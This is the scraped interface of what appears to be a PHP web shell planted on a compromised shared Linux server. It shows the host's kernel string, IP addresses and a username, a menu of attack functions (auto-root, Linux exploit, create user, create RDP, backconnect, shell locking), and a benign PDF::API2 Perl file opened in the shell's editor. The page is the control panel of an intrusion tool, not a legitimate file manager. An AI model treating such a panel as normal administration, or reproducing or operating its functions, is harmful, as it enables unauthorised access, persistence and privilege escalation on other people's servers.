Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
PDF /
API2 /
Basic /
PDF /
[ HOME SHELL ]
Name
Size
Permission
Action
Filter
[ DIR ]
drwxr-xr-x
Array.pm
2.5
KB
-rw-r--r--
Bool.pm
798
B
-rw-r--r--
Dict.pm
9.69
KB
-rw-r--r--
File.pm
47.38
KB
-rw-r--r--
Filter.pm
3.11
KB
-rw-r--r--
Literal.pm
2.14
KB
-rw-r--r--
Name.pm
2.68
KB
-rw-r--r--
Null.pm
1.27
KB
-rw-r--r--
Number.pm
750
B
-rw-r--r--
Objind.pm
7.27
KB
-rw-r--r--
Page.pm
2.1
KB
-rw-r--r--
Pages.pm
10.23
KB
-rw-r--r--
String.pm
5
KB
-rw-r--r--
Utils.pm
2.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Filter.pm
# Code in the PDF::API2::Basic::PDF namespace was originally copied from the # Text::PDF distribution. # # Copyright Martin Hosken <Martin_Hosken@sil.org> # # Martin Hosken's code may be used under the terms of the MIT license. # Subsequent versions of the code have the same license as PDF::API2. package PDF::API2::Basic::PDF::Filter; use strict; use warnings; our $VERSION = '2.043'; # VERSION use PDF::API2::Basic::PDF::Filter::ASCII85Decode; use PDF::API2::Basic::PDF::Filter::ASCIIHexDecode; use PDF::API2::Basic::PDF::Filter::FlateDecode; use PDF::API2::Basic::PDF::Filter::LZWDecode; use PDF::API2::Basic::PDF::Filter::RunLengthDecode; use Scalar::Util qw(blessed reftype); =head1 NAME PDF::API2::Basic::PDF::Filter - Abstract superclass for PDF stream filters =head1 SYNOPSIS $f = PDF::API2::Basic::PDF::Filter->new; $str = $f->outfilt($str, 1); print OUTFILE $str; while (read(INFILE, $dat, 4096)) { $store .= $f->infilt($dat, 0); } $store .= $f->infilt("", 1); =head1 DESCRIPTION A Filter object contains state information for the process of outputting and inputting data through the filter. The precise state information stored is up to the particular filter and may range from nothing to whole objects created and destroyed. Each filter stores different state information for input and output and thus may handle one input filtering process and one output filtering process at the same time. =head1 METHODS =head2 PDF::API2::Basic::PDF::Filter->new Creates a new filter object with empty state information ready for processing data both input and output. =head2 $dat = $f->infilt($str, $isend) Filters from output to input the data. Notice that $isend == 0 implies that there is more data to come and so following it $f may contain state information (usually due to the break-off point of $str not being tidy). Subsequent calls will incorporate this stored state information. $isend == 1 implies that there is no more data to follow. The final state of $f will be that the state information is empty. Error messages are most likely to occur here since if there is required state information to be stored following this data, then that would imply an error in the data. =head2 $str = $f->outfilt($dat, $isend) Filter stored data ready for output. Parallels C<infilt>. =cut sub new { my $class = shift(); my $self = {}; bless $self, $class; return $self; } sub release { my $self = shift(); return $self unless ref($self); # delete stuff that we know we can, here my @tofree = map { delete $self->{$_} } keys %$self; while (my $item = shift @tofree) { my $ref = ref($item); if (blessed($item) and $item->can('release')) { $item->release(); } elsif ($ref eq 'ARRAY') { push @tofree, @$item; } elsif (defined(reftype($ref)) and reftype($ref) eq 'HASH') { release($item); } } # check that everything has gone foreach my $key (keys %$self) { # warn ref($self) . " still has '$key' key left after release.\n"; $self->{$key} = undef; delete $self->{$key}; } } 1;
Close